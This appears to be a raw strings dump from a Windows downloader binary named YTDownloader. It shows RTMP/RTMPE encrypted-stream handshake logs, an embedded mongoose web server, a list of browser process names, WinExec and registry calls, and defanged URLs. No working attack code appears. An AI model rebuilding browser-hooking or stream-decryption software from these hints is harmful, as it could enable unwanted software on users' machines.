NetStream.Play.Start
NetConnection.Connect.InvalidApp
NetStream.Play.StreamNotFound
NetStream.Authenticate.UsherToken
Publisher password
pubPasswd
Key for SecureToken response
Justin.tv authentication token
URL to player SWF file
swfUrl
URL of played media's web page
pageUrl
URL to played stream
tcUrl
DH public key does not fulfill y^q mod p = 1
DH public key must be at most p-2
DH public key must be at least 2
RC4 In Key:
RC4 Out Key:
%s: Couldn't calculate correct DH offset (got %d), exiting!
%s: Couldn't calculate correct digest offset (got %d), exiting
%s: Couldn't calculate DH offset (got %d), exiting!
%s: Couldn't calculate digest offset (got %d), exiting!
RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx
Connecting via SOCKS proxy: %s:%d
SWFSize : %u
live : %s
StopTime : %d msec
StartTime : %d msec
flashVer : %s
NetStream.Authenticate.UsherToken : %s
subscribepath : %s
auth : %s
pageUrl : %s
swfUrl : %s
tcUrl : %s
Playpath : %s
Port : %d
Protocol : %s
s %-7s %s
Unknown option %s
%s://%.*s:%d/%.*s
Problem accessing the DNS. (addr: %s)
%s, error
%s, Authentication failed: unknown auth mode: %s
%s, Authentication failed
%s, new app: %.*s tcUrl: %.*s playpath: %s
&nonce=%s&cnonce=%s&nc=%s&response=%s
%s, md5(%s:%s:%s:%s:%s:%s) =>
%s, md5(%s:/%.*s) =>
%s, md5(%s:%s:%s) =>
%s, pubToken1: %s
?%s&user=%s
%s, Authentication failed: no such user
%s, Authentication failed: wrong password
%s, pubToken2: %s
&challenge=%s&response=%s&opaque=%s
%s, b64(md5_2) = %s
%s, b64(%d) = %s
%s, b64(md5_1) = %s
%s, md5(%s%s%s) =>
%s, par:"%s" = val:"%s"
%s, need to set pubUser & pubPasswd for publisher auth
%s, wrong pubUser & pubPasswd for publisher auth
%-22.*s%s
%s, error decoding meta data packet
%s, received: chunk size change to %d
%s: server BW = %d
%s: client BW = %d %d
%s, recv returned %d. GetSockError(): %d (%s)
POST /%s%s/%d HTTP/1.1
Host: %.*s:%d
Content-length: %d
HTTP/1.1 200
%s, RTMP send error %d (%d bytes)
%s: fd=%d, size=%d
Invoking %s
sanity failed!! trying to send header of type: 0xx.
%s, failed to allocate packet
FCSubscribe: %s
UsherToken: %s
%s, %d, pauseTime=%d
%s, seekTime=%d, stopTime=%d, sending play: %s
sending ctrl. type: 0xx
%s: Ignoring SWFVerification request, use --swfVfy!
%s: SWFVerification Type %d request not supported! Patches welcome...
%s, SWFVerification ping received:
%s, Stream Begin %d
%s, Stream EOF %d
%s, Stream Dry %d
%s, Stream IsRecorded %d
%s, Ping %d
%s, Stream BufferEmpty %d
%s, Stream BufferReady %d
%s, Stream xx %d
%s, received ctrl. type: %d, len: %d
%s, RTMP socket closed by peer
%s, No valid HTTP response found
%s, failed to read RTMP packet body. len: %u
%s, failed to read extended timestamp
%s, failed to read RTMP packet header. type: %x
%s, m_nChannel: %0x
%s, failed to read RTMP packet header 3nd byte
%s, failed to read RTMP packet header 2nd byte
%s, failed to read RTMP packet header
%s: fd=%d
%s: client signature does not match!
%s: Handshaking finished....
%s: Genuine Adobe Flash Media Server
%s: Server not genuine Adobe!
%s: Signature calculated:
%s: Digest key:
%s: Server sent signature:
%s: Wait, did the server just refuse signed authentication?
%s: Client signature calculated:
%s: Calculated digest key from secure key and server digest:
%s: Secret key:
%s: Wrong secret key position!
%s: Server DH public key offset: %d
%s: FMS Version : %d.%d.%d.%d
%s: Server Uptime : %d
%s: Type mismatch: client sent %d, server answered %d
%s: Type Answer : X
%s: Initial client digest:
%s: Client digest offset: %d
%s: Couldn't write public key!
%s: Couldn't generate Diffie-Hellmann public key!
%s: DH pubkey position: %d
%s: Couldn't initialize Diffie-Hellmann!
%s: Client type: X
%s: Genuine Adobe Flash Player
%s: Client not genuine Adobe!
%s: Client sent signature:
%s: 2nd handshake:
%s: Sending handshake response:
%s: Server signature calculated:
%s: Client DH public key offset: %d
%s: Player Version: %d.%d.%d.%d
%s: Client Uptime : %d
%s: Initial server digest:
%s: Server digest offset: %d
%s: Unknown version x
%s: Type Requested : X
%s, RTMP connect failed.
%s, handshaked
%s, handshake failed.
%s, ... connected, handshaking
%s, Could not connect for handshake
%s, no SSL/TLS support
%s, SOCKS returned error code %d
%s, failed to create socket. Error: %d
%s, SOCKS negotiation failed.
%s ... SOCKS negotiation
%s, failed to connect socket. %d (%s)
Closing connection: %s
%s, onStatus: %s
trying to connect with redirected url
%s, error description: %s
%s, received error for method call <%s>
%s, received result id %f without matching request
%s, received result for method call <%s>
%s, server invoking <%s>
%s, error decoding invoke packet
%s, Sanity failed. no string method in invoke packet
%s, flex shared object, size %u bytes, not supported, ignoring
%s, flex message, size %u bytes, not fully supported
%s, received: notify %u bytes
%s, shared object, not supported, ignoring
%s, received: invoke %u bytes
%s, unknown packet type received: 0xx
%s, flex stream send, size %u bytes, not supported, ignoring
%s, received: bytes read report
Wrong data size (%u), stream corrupted, aborting!
Couldn't find the seeked keyframe in this chunk!
First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?
FLV Stream: Keyframe doesn't match!
Found keyframe with resume-keyframe timestamp!
Checked keyframe successfully!
ignoring too small audio packet: size: %d
ignoring too small video packet: size: %d
Got Play.Complete or Play.Stop from server. Assuming stream is complete
%s: Failed to close listening socket, error %d
Caught signal: %d, cleaning up, just a second...
-c, --cert cert RTMPS cert
-k, --key key RTMPS key
-p, --port port Overrides the port in the rtmp url
%s, _beginthread failed with %d
Unknown command '%c', ignoring
-o %s
-j "%s"
-p "%s"
-W "%s"
-f "%s"
-a "%s"
-r "%s"
%s, client invoking <%s>
%s, received packet type X, size %u bytes
%s: accept failed
%s: processed request
%s: accepted connection from %s
%s, listen failed
%s, TCP bind failed for port number: %d
%s, couldn't create socket
chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe
._-$,;~()
.mpeg
video/webm
.webm
.xslt
.json
audio/x-mpegurl
.torrent
.jpeg
.shtml
.shtm
.html
url_rewrite_patterns
ssl_certificate
listening_ports
index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
**.shtml$|**.shtm$
mydomain.com
**.cgi$|**.pl$|**.php$
SSL_CTX_use_certificate_chain_file
SSL_CTX_set_default_passwd_cb
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey_file
%s %s:
[0lu] [error] [client %s]
%.*s%s
%d-%3s-%d %d:%d:%d
%*3s, %d %3s %d %d:%d:%d
%d %3s %d %d:%d:%d
%d/%3s/%d %d:%d:%d
%[^:]:%[^:]:%s
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"
%s:%s:%s
%s.tmp
<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>
%d-%b-%Y %H:%M
**.htpasswd$
%s%c%s
%a, %d %b %Y %H:%M:%S GMT
HTTP/
%s: CGI env buffer truncated for [%s]
HTTP_%s=%s
REMOTE_USER=%s
PERLLIB=%s
SystemDrive=%s
SYSTEMROOT=%s
COMSPEC=%s
PATH_INFO=%s
PATH=%s
CONTENT_LENGTH=%s
QUERY_STRING=%s
CONTENT_TYPE=%s
HTTPS=%s
PATH_TRANSLATED=%s
SCRIPT_FILENAME=%s
SCRIPT_NAME=%.*s%s
REQUEST_URI=%s
REMOTE_PORT=%d
REMOTE_ADDR=%s
REQUEST_METHOD=%s
SERVER_PORT=%d
SERVER_PROTOCOL=HTTP/1.1
DOCUMENT_ROOT=%s
SERVER_ROOT=%s
SERVER_NAME=%s
Cannot SSI #exec: [%s]: %s
Bad SSI #exec: [%s]
HTTP/1.1 200 OK
<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>
HTTP/1.1 207 Multi-Status
%d.%d.%d.%d%n
%d.%d.%d.%d/%d%n
%lf%c
%s/%s
boundary=™s
HTTP/1.1 302 Found
Location: hXXps://%s:%d%s
24[^:]
%d.%d.%d.%d:%d%n
Cannot add SSL socket, is -ssl_certificate option set?
%s: %.*s: invalid port spec. Expecting list of: %s
[IP_ADDRESS:]PORT[s|p]
%s: cannot bind to %.*s: %s
set_ports_option
%s - %s [%s] "%s %s HTTP/%s" %d %I64d
%d/%b/%Y:%H:%M:%S %z
%s: subnet must be [ |-]x.x.x.x[/x]
Cannot open %s: %s
calloc(): %s
connect(%s:%d): %s
socket(): %s
gethostbyname(%s): %s
%s: %s is not allowed to connect
HTTP/1.1 %d %s
Content-Length: %d
Connection: %s
Error %d: %s
%s: CreateProcess(%s): %ld
%s%s%s\%s
%.*s%c%s
.htpasswd
fopen(%s): %s
%s: cannot open %s: %s
<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>
<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>
Error: opendir(%s): %s
Date: %s
Last-Modified: %s
Etag: %s
HTTP/1.1 100 Continue
Cannot create CGI pipe: %s
fopen: %s
CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]
Cannot spawn CGI process [%s]: %s
put_dir(%s): %s
HTTP/1.1 %d OK
Bad SSI #include: [%s]
Cannot open SSI #include: [%s]: fopen(%s): %s
%s: SSI tag is too large
%s: unknown SSI command: "%s"
SSI #include level is too deep (%s)
Method %s is not implemented
HTTP/1.1 301 Moved Permanently
Location: %s/
remove(%s): %s
Bad HTTP version
Bad HTTP version: [%s]
Invalid URI: [%s]
%s: option value cannot be NULL
Invalid option: %s
warning: %s: duplicate option
Hello from mongoose! Remote port: %d
HttpSendRequestW failed with error code
HttpOpenRequestW failed with error code
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Visual C   CRT: Not enough memory to complete call to strerror.
cmd.exe
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb
.?AVCHttp@@
<>"#{}|\^~[]`' ?&
.?AVCRtmpe@@
.?AV?$IBaseInterface@VIKeysBank@@@@
.?AVIKeysBank@@
.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@
.?AVCKeysBank@@
.?AVCRtmpDataProperty@@
.?AVCRtmpPacket@@
.?AVCRtmpParser@@
.?AVChromeBrowserWindow@@
.?AVFirefoxBrowserWindow@@
.?AVOperaBrowserWindow@@
HTTP://
.?AVHttpParser@@
.?AVCHttpDownload@@
zcÁ
WinExec
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjectsEx
EnumChildWindows
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
LIBEAY32.dll
HttpEndRequestW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
VERSION.dll
CertGetNameStringW
CertFreeCertificateContext
CryptMsgClose
CertCloseStore
CertFindCertificateInStore
CryptMsgGetParam
CRYPT32.dll
PSAPI.DLL
IsValidURL
urlmon.dll
GdiplusShutdown
gdiplus.dll
GetCPInfo
GetProcessHeap
nnn%XXX
pppaSSS
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
Content-Disposition: form-data; name="%s"
XXX
Content-Type: multipart/form-data; boundary=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
ConfigDB.dll
config.xml
%%X
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
CertGetNameString failed.
CryptDecodeObject failed with %x
CertFindCertificateInStore failed with %x
MoreInfo Link : %s
Publisher Link : %s
Program Name : %s
CryptMsgGetParam failed with %x
CryptQueryObject failed with %x
user32.dll
WININET.DLL
kernel32.dll
d/d/%d d:d:d::d
%d.%d.%d.%d
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
"%s" "%s"
"%s" %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPPipeName] Name: %s
PipeName
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey
[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CClientRtmpe::operator =] Key Out: %p
[CClientRtmpe::operator =] Key In:
[CClientRtmpe::operator =]
[CClientRtmpe::OnHandshake] Step 3 - update the keystreams
[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 2 - Client version: %x
[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d
[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d
[CKeysBank::Work] Exit...
[CKeysBank::Work] Enter...
[CKeysBank::Start]
[CKeysBank::Stop]
[CKeysBank::GetPublicKey] Remove Key, Total: %d
[CKeysBank::GenerateKey] Add Key, Total: %d
[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey
[CKeysBank::GenerateKey] ___Error DiffieHellman.Init
[CRtmpe::operator =] Key Out: %p
[CRtmpe::operator =] Key In:
[CRtmpe::operator =]
[CRtmpe::Initialize] Cache Writer: %p
[CRtmpe::ParseHeader] Protocol - RTMPE
[CRtmpe::ParseHeader] Protocol - RTMP
[CRtmpe::ParseHeader]
[CRtmpe::ParseData] Got all %d/%d bytes
[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpe::ParseData]
[CRtmpe::Encrypt] Encryped %d bytes, Key: %p
[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p
[CRtmpe::ParseBuffer] Analyze Next Packet...
[CRtmpe::HandShake] Step 1: Complete
[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server
[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey
[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CRtmpe::HandShake] Step 1: Start...
[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes
[CRtmpe::UpdateBuffer] Handshake already completed
[CRtmpe::UpdateBuffer] Analyzing %d bytes...
[CRtmpStream::OnHandShake] ___Error - Unknown step
[CRtmpe::OnHandshake] Step 3 - Complete
[CRtmpe::OnHandshake] Step 3 - update the keystreams
[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption
[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey
[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CRtmpe::OnHandshake] ___Error Step 3: Writing client response
[CRtmpe::OnHandshake] Step 3: Start...
[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***
[CRtmpe::OnHandshake] ___Warning - server version
[CRtmpe::OnHandshake] ___Error Step 2: Reading server response
[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***
[CRtmpe::OnHandshake] Step 2 - Server version: %x
[CRtmpe::OnHandshake] Step 2 - Server up time: %d
[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature
[CRtmpe::OnHandshake] Step 2 - Protocol: %d
[CRtmpe::OnHandshake] Step 2: Start...
[CRtmpPacket::Reset]
[CRtmpPacket::DumpHeader] Info Field: %d
[CRtmpPacket::DumpHeader] Packet Type: %d
[CRtmpPacket::DumpHeader] Packet Length: %d
[CRtmpPacket::DumpHeader] Absolute Time: %d
[CRtmpPacket::DumpHeader] Time: %d
[CRtmpPacket::DumpHeader] Channel: %d
[CRtmpPacket::DumpHeader] Header Type: %d
[CRtmpPacket::DumpHeader] Header Size: %d
[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed
[CRtmpPacket::ParseFlvHeader] Absolute Time: %d
[CRtmpPacket::ParseFlvHeader] Packet Length: %d
[CRtmpPacket::ParseFlvHeader] Packet Type: %d
[CRtmpPacket::ParseFlvHeader] Channel: %d
[CRtmpPacket::ParseFlvHeader] Header Type: %d
[CRtmpPacket::ParseFlvHeader] Header Size: %d
[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed
[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)
[CRtmpPacket::AppendData] ___Error - out of memory
[CRtmpPacket::AppendData] ___Warning - no bytes to append
[CRtmpPacket::Allocate] Allocated %d (Total: %d)
[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9
[CRtmpPacket::ParseHeader] Extended Time: %d
[CRtmpPacket::ParseHeader] Info Field: %d
[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M
[CRtmpPacket::ParseHeader] Packet Type: %d
[CRtmpPacket::ParseHeader] Packet Size: %d
[CRtmpPacket::ParseHeader] Time: %d
[CRtmpPacket::ParseHeader] Channel: %d
[CRtmpPacket::ParseHeader] Header Type: %d
[CRtmpPacket::ParseHeader] Header Size: %d
[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseHeader] ___Error - Header already parsed
[CRtmpParser::Stop]
[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d
[CRtmpParser::ProcessData] Analyze Data: %d bytes
[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing
[CRtmpParser::OnHandshake] Step 4: Complete
[CRtmpParser::OnHandshake] Step 3: Complete
[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 2 - Server up time: %d
[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 1 - Client up time: %d
[CRtmpParser::OnHandshake] Protocol State: %d
[CRtmpParser::OnAudio]
[CRtmpParser::OnVideo]
[CRtmpParser::OnFLV]
[CRtmpParser::OnData]
[CRtmpParser::SetTimeStartPosition] Time: %d
[CRtmpParser::SetTimeEndPosition] Time: %d
[CRtmpParser::Close]
[CRtmpParser::OnError]
[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)
[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)
[CRtmpParser::Sync - %p]
[CRtmpParser::ParseFlvHeader]
[CRtmpParser::ParseData] Accumulated all %d/%d bytes
[CRtmpParser::ParseData] Chunk not ready
[CRtmpParser::ParseData] Going to append %d bytes
[CRtmpParser::ParseData] Got all %d/%d bytes
[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpParser::ParseData] ___Warning no data
[CRtmpParser::ParseData]
[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d
[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)
[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)
[CRtmpParser::ParseDataType] EOF Object (Offset: %d)
[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)
[CRtmpParser::ParseDataType] Object (Offset: %d)
[CRtmpParser::OnChangeChunkSize] %d -> %d
[CRtmpParser::OnChangeChunkSize]
[CRtmpParser::OnReadBytes] Bytes read: %d
[CRtmpParser::OnReadBytes]
[CRtmpParser::OnMetadata]
[CRtmpParser::Reset - %p]
[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type
[CRtmpParser::ReadObject] EOF Object (Offset: %d)
[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)
[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - NULL (Offset: %d)
[CRtmpParser::ReadObject] %s - Object (Offset: %d)
[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP
[CRtmpParser::ParseHandshakeHeader]
[CRtmpParser::ParseHeader] Absolute Time: %d
[CRtmpParser::ParseHeader] New Time: %d
[CRtmpParser::ParseHeader] New Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p
[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d
[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d
[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d
[CRtmpParser::ParseHeader]
[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes
[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)
[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes
[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!
[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!
[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...
[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes
[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)
[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...
[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes
[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...
[CRtmpParser::operator = %p] <= %p
[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...
[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d
[CRtmpParser::OnPing] SWFVerification
[CRtmpParser::OnPing] Time: %d
[CRtmpParser::OnPing] -- Unknown %d --
[CRtmpParser::OnPing] Stream buffer ready %d
[CRtmpParser::OnPing] Pause time: %d
[CRtmpParser::OnPing] Stream buffer empty %d
[CRtmpParser::OnPing] Pong %d
[CRtmpParser::OnPing] Stream is recorded %d
[CRtmpParser::OnPing] Ping %d
[CRtmpParser::OnPing] Stream dry %d
[CRtmpParser::OnPing] Stream EOF %d
[CRtmpParser::OnPing] Stream begin %d
[CRtmpParser::OnPing] Type: %d
[CRtmpParser::OnPing]
[CRtmpParser::OnServerBW] Server Bandwidth: %d
[CRtmpParser::OnServerBW]
[CRtmpParser::OnClientBW] Client Bandwidth: %d
[CRtmpParser::OnClientBW]
[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s
[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )
[CRtmpParser::OnInvoke] getStats
[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s
[CRtmpParser::OnInvoke] closeStream: StreamID = %g
[CRtmpParser::OnInvoke] deleteStream: StreamID = %g
[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s
[CRtmpParser::OnInvoke] startStream: PlayPath = %s
[CRtmpParser::OnInvoke] createStream: StreamID = %g
[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )
[CRtmpParser::OnInvoke] %s( '%s', '%s' )
[CRtmpParser::OnInvoke] seek( '%d' )
[CRtmpParser::OnInvoke] %s( '%d', '%g' )
[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d
[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s
[CRtmpParser::OnInvoke] _error - code: %s, level: %s
[CRtmpParser::OnInvoke] %s( '%s' )
[CRtmpParser::OnInvoke] _result createStream: StreamID = %g
[CRtmpParser::OnInvoke] _result connect - AMF3
[CRtmpParser::OnInvoke] _result connect: %s
[CRtmpParser::OnInvoke] _result for Method: %s
[CRtmpParser::OnInvoke] Method: %s
[CRtmpParser::OnInvoke]
Download Helper SendMsgToBtn, url: %s
Could not find converter registry key, %ws
Could not create process, error %x, proc %ws
RegContentType%d
RegRawData%d
RegProtocol%d
RegAgent%d
RegCookie%d
1.0.1.0
RegFileName%d
RegUrl
RegURL%d
